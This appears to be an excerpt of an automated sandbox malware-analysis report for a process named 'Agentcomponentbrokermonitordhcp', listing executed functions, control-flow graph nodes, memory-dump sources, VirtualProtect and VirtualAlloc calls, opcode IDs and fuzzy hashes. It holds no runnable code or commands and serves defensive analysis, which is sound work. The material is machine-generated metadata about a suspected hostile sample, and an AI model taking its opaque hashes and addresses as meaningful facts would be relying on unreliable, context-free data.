                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:6
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 20048 7ffd9b7db4ba 20049 7ffd9b7db4c9 VirtualProtect 20048->20049 20051 7ffd9b7db5ae 20049->20051 20044 7ffd9b7dc491 20045 7ffd9b7dc49f VirtualAlloc 20044->20045 20047 7ffd9b7dc554 20045->20047

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B7D0D48 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263
                                                                                                                    • Opcode ID: fa3f3d00b50b6f691c8440fcaff63dcf10926f40879ddd676cd0d80ff534980d
                                                                                                                    • Instruction ID: e560d38dacb8ebb2afa128f8611c5faad877f6a9d0fb7c277c405b357e626ee8
                                                                                                                    • Opcode Fuzzy Hash: fa3f3d00b50b6f691c8440fcaff63dcf10926f40879ddd676cd0d80ff534980d
                                                                                                                    • Instruction Fuzzy Hash: C7911475A19A8E4FE759DF688879BA97FE0FB95340F0502BAD049C73E2DBB81814C700
                                                                                                                    Function 00007FFD9B7E1752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7ffd9b7e1752 1 7ffd9b7e1757-7ffd9b7e177d 0->1 4 7ffd9b7e18d1-7ffd9b7e18fb 1->4 5 7ffd9b7e1783-7ffd9b7e17ae 1->5 9 7ffd9b7e1947-7ffd9b7e194a 4->9 10 7ffd9b7e18fd-7ffd9b7e191a 4->10 17 7ffd9b7e17bd-7ffd9b7e1845 5->17 18 7ffd9b7e17b0-7ffd9b7e17ba 5->18 16 7ffd9b7e1951-7ffd9b7e1958 9->16 14 7ffd9b7e1a8b-7ffd9b7e1a93 10->14 15 7ffd9b7e1920-7ffd9b7e1945 10->15 23 7ffd9b7e1a94-7ffd9b7e1a99 14->23 15->9 20 7ffd9b7e195a-7ffd9b7e1967 16->20 51 7ffd9b7e188c-7ffd9b7e188f 17->51 52 7ffd9b7e1847-7ffd9b7e188a 17->52 18->17 26 7ffd9b7e196e-7ffd9b7e1986 20->26 27 7ffd9b7e1a9b-7ffd9b7e1aaf 23->27 28 7ffd9b7e1a47-7ffd9b7e1a62 23->28 34 7ffd9b7e1a2c-7ffd9b7e1a42 26->34 35 7ffd9b7e198c-7ffd9b7e19df 26->35 30 7ffd9b7e1c4d-7ffd9b7e1c4e 27->30 44 7ffd9b7e1a69-7ffd9b7e1a84 28->44 36 7ffd9b7e1c55-7ffd9b7e1c61 30->36 37 7ffd9b7e1c50 call 7ffd9b7e2918 30->37 34->30 35->44 59 7ffd9b7e19e5-7ffd9b7e19f0 35->59 37->36 44->14 53 7ffd9b7e1891-7ffd9b7e18a2 51->53 54 7ffd9b7e18a4-7ffd9b7e18a5 51->54 58 7ffd9b7e18b1-7ffd9b7e18cb 52->58 53->58 54->58 58->4 58->5 61 7ffd9b7e19f6-7ffd9b7e1a00 59->61 62 7ffd9b7e0f9d-7ffd9b7e0fdc 59->62 61->23 65 7ffd9b7e1a06-7ffd9b7e1a26 61->65 73 7ffd9b7e0fde-7ffd9b7e1149 62->73 65->34 65->35 98 7ffd9b7e114b-7ffd9b7e1154 73->98 99 7ffd9b7e1178-7ffd9b7e11b9 73->99 100 7ffd9b7e115a-7ffd9b7e116a 98->100 101 7ffd9b7e1699-7ffd9b7e16cf 98->101 111 7ffd9b7e11bb-7ffd9b7e11cd 99->111 112 7ffd9b7e11ce-7ffd9b7e1243 99->112 105 7ffd9b7e1170-7ffd9b7e1174 100->105 113 7ffd9b7e1748-7ffd9b7e1751 101->113 114 7ffd9b7e16d1-7ffd9b7e1710 101->114 105->99 111->112 129 7ffd9b7e1245-7ffd9b7e126e 112->129 130 7ffd9b7e1274-7ffd9b7e12c3 112->130 113->0 123 7ffd9b7e172a-7ffd9b7e1746 114->123 124 7ffd9b7e1712-7ffd9b7e1715 114->124 123->113 123->114 124->123 125 7ffd9b7e1717-7ffd9b7e1727 124->125 125->123 129->130 138 7ffd9b7e12c5-7ffd9b7e12ca 130->138 139 7ffd9b7e12cf-7ffd9b7e1307 130->139 140 7ffd9b7e1683-7ffd9b7e1693 138->140 144 7ffd9b7e1309-7ffd9b7e130e 139->144 145 7ffd9b7e1313-7ffd9b7e134b 139->145 140->101 140->105 144->140 149 7ffd9b7e1357-7ffd9b7e138f 145->149 150 7ffd9b7e134d-7ffd9b7e1352 145->150 154 7ffd9b7e139b-7ffd9b7e13d3 149->154 155 7ffd9b7e1391-7ffd9b7e1396 149->155 150->140 159 7ffd9b7e13d5-7ffd9b7e13da 154->159 160 7ffd9b7e13df-7ffd9b7e1417 154->160 155->140 159->140 164 7ffd9b7e1419-7ffd9b7e141e 160->164 165 7ffd9b7e1423-7ffd9b7e145b 160->165 164->140 169 7ffd9b7e1467-7ffd9b7e149f 165->169 170 7ffd9b7e145d-7ffd9b7e1462 165->170 174 7ffd9b7e14ab-7ffd9b7e14e3 169->174 175 7ffd9b7e14a1-7ffd9b7e14a6 169->175 170->140 179 7ffd9b7e14e5-7ffd9b7e14ea 174->179 180 7ffd9b7e14ef-7ffd9b7e1527 174->180 175->140 179->140 184 7ffd9b7e1529-7ffd9b7e152e 180->184 185 7ffd9b7e1533-7ffd9b7e156b 180->185 184->140 189 7ffd9b7e1577-7ffd9b7e15af 185->189 190 7ffd9b7e156d-7ffd9b7e1572 185->190 194 7ffd9b7e15bb-7ffd9b7e15c4 189->194 195 7ffd9b7e15b1-7ffd9b7e15b6 189->195 190->140 194->140 195->140
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N_H
                                                                                                                    • API String ID: 0-1910052747
                                                                                                                    • Opcode ID: 56abee8864c48ecc65e4c734fc9240ab4b4041c5347486ac60c8117448b10bc7
                                                                                                                    • Instruction ID: dac6ef67ba1ded4819b5edf4af91727ed50befdd4b1192f7e6cd1cc4dbd3d422
                                                                                                                    • Opcode Fuzzy Hash: 56abee8864c48ecc65e4c734fc9240ab4b4041c5347486ac60c8117448b10bc7
                                                                                                                    • Instruction Fuzzy Hash: B462C421B19A4E4FEBA8EB68C4A67787392FF94340F4506B9D05EC36F2DE24BD458740
                                                                                                                    Function 00007FFD9B7DB4BA Relevance: 1.6, APIs: 1, Instructions: 141memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 197 7ffd9b7db4ba-7ffd9b7db4c7 198 7ffd9b7db4c9-7ffd9b7db4d1 197->198 199 7ffd9b7db4d2-7ffd9b7db4e3 197->199 198->199 200 7ffd9b7db4e5-7ffd9b7db4ed 199->200 201 7ffd9b7db4ee-7ffd9b7db5ac VirtualProtect 199->201 200->201 205 7ffd9b7db5b4-7ffd9b7db5dc 201->205 206 7ffd9b7db5ae 201->206 206->205
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d7000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: d741ff7dd66a506a93f6012af93f27f3dbb4594c568ad82f8abf57e3f721498f
                                                                                                                    • Instruction ID: a8ea4c4f56ec51657d4de390e97623fc8b3b351253f41e418b661877f074a293
                                                                                                                    • Opcode Fuzzy Hash: d741ff7dd66a506a93f6012af93f27f3dbb4594c568ad82f8abf57e3f721498f
                                                                                                                    • Instruction Fuzzy Hash: AB411B3190D7884FD7199BA898565E97FE0EF96321F0443AFD099C3192CA746406C792
                                                                                                                    Function 00007FFD9B7DC491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 242 7ffd9b7dc491-7ffd9b7dc49d 243 7ffd9b7dc4a1-7ffd9b7dc4dd 242->243 244 7ffd9b7dc49f 242->244 245 7ffd9b7dc4e1-7ffd9b7dc552 VirtualAlloc 243->245 244->243 244->245 248 7ffd9b7dc55a-7ffd9b7dc582 245->248 249 7ffd9b7dc554 245->249 249->248
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d7000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 04756d9c0501d438e41e5adf20a1198666507c7d453f3df8cd670d6c165695c2
                                                                                                                    • Instruction ID: 831ca31d8088c025a40b3d77225c57cd655a6ace0127c71836d8452f5b6534e2
                                                                                                                    • Opcode Fuzzy Hash: 04756d9c0501d438e41e5adf20a1198666507c7d453f3df8cd670d6c165695c2
                                                                                                                    • Instruction Fuzzy Hash: 9D31FB31A0CB8C4FDB1DAB6898166F97BF0EF96321F04426FD08AC3593DA65681687D1
                                                                                                                    Function 00007FFD9B7FB549 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 251 7ffd9b7fb549-7ffd9b7fb556 252 7ffd9b7fb561-7ffd9b7fb592 251->252 254 7ffd9b7fa70c-7ffd9b7fa70f 252->254 255 7ffd9b7fb598-7ffd9b7fb59d 252->255 256 7ffd9b7fa9dc-7ffd9b7fa9e4 254->256 257 7ffd9b7fa715-7ffd9b7fbbb6 254->257 255->254 258 7ffd9b7fa9e6-7ffd9b7fa9ed 256->258 259 7ffd9b7fa9f2-7ffd9b7fc2c9 256->259 257->254 267 7ffd9b7fbbbc-7ffd9b7fbbc1 257->267 258->254 262 7ffd9b7fc2cb-7ffd9b7fc2d8 259->262 263 7ffd9b7fc2dd-7ffd9b7fc728 call 7ffd9b7f5dd0 259->263 262->254 263->254 267->254
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 0-2679148245
                                                                                                                    • Opcode ID: 11c6e9c9c8c37a0371eee48467849fff373247c47747c7b73eeb2ddd381395d0
                                                                                                                    • Instruction ID: 634de7b4f0570f7ac1305be67aec396480ae9d05fb9e42cfd46cd3c6c2907d18
                                                                                                                    • Opcode Fuzzy Hash: 11c6e9c9c8c37a0371eee48467849fff373247c47747c7b73eeb2ddd381395d0
                                                                                                                    • Instruction Fuzzy Hash: 3EF0CD31A0D3594FD771DB14881179977B0EF85320F0606BEC88C972E2CA38790587D2
                                                                                                                    Function 00007FFD9B801A49 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 269 7ffd9b801a49-7ffd9b801a7a 270 7ffd9b801a7e-7ffd9b801a83 269->270
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 0-2852464175
                                                                                                                    • Opcode ID: 7fb2cd1e96c361bc97c451b0c6bf1d62838c49eeba54bbbcf8bcd13edf9ca410
                                                                                                                    • Instruction ID: becf1f39e9525a793ba07497bee1ae7102b934d9ba4949fd777c9ef4a46dbcae
                                                                                                                    • Opcode Fuzzy Hash: 7fb2cd1e96c361bc97c451b0c6bf1d62838c49eeba54bbbcf8bcd13edf9ca410
                                                                                                                    • Instruction Fuzzy Hash: 32E0D830B557844FCB0DAA2C88654607BB1EF57205B8552EAC046CB1A3DD1CDC86C741
                                                                                                                    Function 00007FFD9B80A529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 271 7ffd9b80a529-7ffd9b80a53d 272 7ffd9b80a53f-7ffd9b80a55a 271->272 273 7ffd9b80a55e-7ffd9b80a563 272->273
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: e4335c15f8502fd7149023867cb01fdf5b34850c5552e529227bd14a7fc1a723
                                                                                                                    • Instruction ID: 9c1fd412609d37193d74b1f63005ae9c0c0a086f861702f3730ee312feda6007
                                                                                                                    • Opcode Fuzzy Hash: e4335c15f8502fd7149023867cb01fdf5b34850c5552e529227bd14a7fc1a723
                                                                                                                    • Instruction Fuzzy Hash: A2E0657160E7C44FC716D6744869454BFA0EF6721174A42EEC045CF5A7EA2DC885CB01
                                                                                                                    Function 00007FFD9B801AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 277 7ffd9b801ad9-7ffd9b801aed 278 7ffd9b801aef-7ffd9b801b04 277->278 279 7ffd9b801b08-7ffd9b801b0d 278->279
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 82b5cee6cb806b32f99d2561997564095496820c05eabd3412fe45730a6a44d6
                                                                                                                    • Instruction ID: 61d0df85dbf79a5133c738b04a6214dfdee090dbd2ed0a8886aa52041204512c
                                                                                                                    • Opcode Fuzzy Hash: 82b5cee6cb806b32f99d2561997564095496820c05eabd3412fe45730a6a44d6
                                                                                                                    • Instruction Fuzzy Hash: B5E01A6154F7C44FCB16EB7488698497FA0EE6B21078B40EEC089CF1B3E62D8849CB01
                                                                                                                    Function 00007FFD9B807E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 7ffd9b807e19-7ffd9b807e44 282 7ffd9b807e48-7ffd9b807e4d 280->282
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 324263061fdba6c8217528b4c8714af13baa9eab1860b642ea0802d85cd419cf
                                                                                                                    • Instruction ID: 746f1d7e87106e55d745ec7dc1c1411a139633b184664479ab4c188562ea6f6d
                                                                                                                    • Opcode Fuzzy Hash: 324263061fdba6c8217528b4c8714af13baa9eab1860b642ea0802d85cd419cf
                                                                                                                    • Instruction Fuzzy Hash: DFE01A6158F7C44FCB16EB7488698447FA1AE6B21078B40EEC185CF1B3E62D8849C701
                                                                                                                    Function 00007FFD9B7F93E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 274 7ffd9b7f93e9-7ffd9b7f9414 276 7ffd9b7f9418-7ffd9b7f941d 274->276
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: e6ba671bab6f85cbfdfc06a0eba5c7e1b00385242674e9a0bf3b912c69499f83
                                                                                                                    • Instruction ID: 3b0b8ed484c465483cbc07f443ba6c6e5324e6a3ae63e25c67437725e8b370ca
                                                                                                                    • Opcode Fuzzy Hash: e6ba671bab6f85cbfdfc06a0eba5c7e1b00385242674e9a0bf3b912c69499f83
                                                                                                                    • Instruction Fuzzy Hash: E3E0E56154E7C48FCB5AEA7488A98547FA0AE6721078A41EEC489CB1B3E6299849C701
                                                                                                                    Function 00007FFD9B7F95D1 Relevance: .3, Instructions: 310COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 653 7ffd9b7f95d1-7ffd9b7f9619 654 7ffd9b7f96b2-7ffd9b7f96b9 653->654 655 7ffd9b7f961f-7ffd9b7f96ab 653->655 656 7ffd9b7f9741-7ffd9b7f9756 654->656 657 7ffd9b7f96bf-7ffd9b7f9706 654->657 655->654 659 7ffd9b7f9758 656->659 660 7ffd9b7f975d-7ffd9b7f978b 656->660 664 7ffd9b7f970d-7ffd9b7f9735 657->664 659->660 669 7ffd9b7f97f1-7ffd9b7f980f 660->669 670 7ffd9b7f978d-7ffd9b7f9792 660->670 687 7ffd9b7f98dc-7ffd9b7f9923 664->687 688 7ffd9b7f973b 664->688 683 7ffd9b7f97c7 669->683 684 7ffd9b7f9811-7ffd9b7f98a7 669->684 671 7ffd9b7f9794-7ffd9b7f9799 670->671 672 7ffd9b7f97a3-7ffd9b7f97aa 670->672 671->672 676 7ffd9b7f97ac-7ffd9b7f97b3 672->676 677 7ffd9b7f97eb-7ffd9b7f97f0 672->677 676->669 679 7ffd9b7f97b5-7ffd9b7f97c0 676->679 677->669 685 7ffd9b7f97c2 679->685 686 7ffd9b7f97d1-7ffd9b7f97d8 679->686 683->686 692 7ffd9b7f98ab-7ffd9b7f98db call 7ffd9b7f9924 684->692 685->683 686->677 690 7ffd9b7f97da-7ffd9b7f97e6 686->690 688->656 690->692
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 333c3c0cfb69cb1fd35db0cf2f4fda35f85b3eaae8527e337497b034e5272e8f
                                                                                                                    • Instruction ID: 07574850b64ae7a0bce609174b7bb0361fad2bd9526164d4a77e0f524975f8c4
                                                                                                                    • Opcode Fuzzy Hash: 333c3c0cfb69cb1fd35db0cf2f4fda35f85b3eaae8527e337497b034e5272e8f
                                                                                                                    • Instruction Fuzzy Hash: 79A19230B19A4A4FDB58EF68C4A4AB977E1FF98304B550679D01EC72E6DF35A842C780
                                                                                                                    Function 00007FFD9B80317D Relevance: .3, Instructions: 287COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ddba1328b38a32bd526d309d88fea39927922b00dafbbc00ce3fe621609e8ab7
                                                                                                                    • Instruction ID: aa194f9ac99e0f142e2126ad520e0e6674e329772a371605e35463e71ca9b80d
                                                                                                                    • Opcode Fuzzy Hash: ddba1328b38a32bd526d309d88fea39927922b00dafbbc00ce3fe621609e8ab7
                                                                                                                    • Instruction Fuzzy Hash: 2691F421B1DA4E0FEBA8EB6884B66B9B2D2FF9C390F054179E44DC72D7DD2869454380
                                                                                                                    Function 00007FFD9B802111 Relevance: .1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 32d5d38d5ac3605d3edbf2ecad1458fb046c51428b20dd45880f99dcbe774fae
                                                                                                                    • Instruction ID: f388f061899ec3c18f9be6ee9e6bbc27016757e412b2a4c00c8e3189c79b2579
                                                                                                                    • Opcode Fuzzy Hash: 32d5d38d5ac3605d3edbf2ecad1458fb046c51428b20dd45880f99dcbe774fae
                                                                                                                    • Instruction Fuzzy Hash: F8315A71A0D94E8FE729DF98C8647F57791EF99360F05017AD44DC32E2DEA86C818781
                                                                                                                    Function 00007FFD9B80D621 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1d6a6fda6c5a1215ca5e021e0da4aa8b6aa2f0cb0424f14c0a1339ec57f4d3b6
                                                                                                                    • Instruction ID: 9cfc9cf229a67b60750ea4f2132cbaee41f650aa0a68d39f6909d251081e4ad5
                                                                                                                    • Opcode Fuzzy Hash: 1d6a6fda6c5a1215ca5e021e0da4aa8b6aa2f0cb0424f14c0a1339ec57f4d3b6
                                                                                                                    • Instruction Fuzzy Hash: 6E210232F0A51D8FEB24DB68D8246E8B7E1EF88350F0505B7D459C72D5DA289E4187C0
                                                                                                                    Function 00007FFD9B7D0C25 Relevance: .1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce1425116253ac88e6adb1b8739f05f54c3f617d50cb26f99954dce6bef7c971
                                                                                                                    • Instruction ID: 67f2cd1db0a968b9ea8ed6d05bea14577f153120f42e2232f3f3c7a84c0ef56e
                                                                                                                    • Opcode Fuzzy Hash: ce1425116253ac88e6adb1b8739f05f54c3f617d50cb26f99954dce6bef7c971
                                                                                                                    • Instruction Fuzzy Hash: 0621DB3AF0D78D4EE712A76898250DC7B60EFC1365F5557B3C0498A1E2D928264AC791
                                                                                                                    Function 00007FFD9B7F7F79 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c69f5718a25ea5e5ff28a19d8d374bd06def8efd6b70a1b434d4a9be9b0097a9
                                                                                                                    • Instruction ID: 676ccaaa2475dd22ea3c0fadfd8f60f631870535c0bab64a3a8581cdba329cf1
                                                                                                                    • Opcode Fuzzy Hash: c69f5718a25ea5e5ff28a19d8d374bd06def8efd6b70a1b434d4a9be9b0097a9
                                                                                                                    • Instruction Fuzzy Hash: 0211272270EF894FE762DB9C58A01647BD1EB5931074A02F7C458C71FBE9189D0583C5
                                                                                                                    Function 00007FFD9B7D0C38 Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8462b8d5d978ed6730a71fdbb7805a45400c224ae1b6d28dec68799696300085
                                                                                                                    • Instruction ID: 673a9375f6cc2355bcb699328423519ec07937e785f9d8a2dab9fb437fb4a13d
                                                                                                                    • Opcode Fuzzy Hash: 8462b8d5d978ed6730a71fdbb7805a45400c224ae1b6d28dec68799696300085
                                                                                                                    • Instruction Fuzzy Hash: BF118F35B0E78D8EE722DB6888641DC7BB0EF82651F5656B7C048DB1E2D9341A49C781
                                                                                                                    Function 00007FFD9B80AD4D Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a50159eb190117ffe39adfd1e0d7d6ac4d191efcef49dee77ed90f3d49795bc
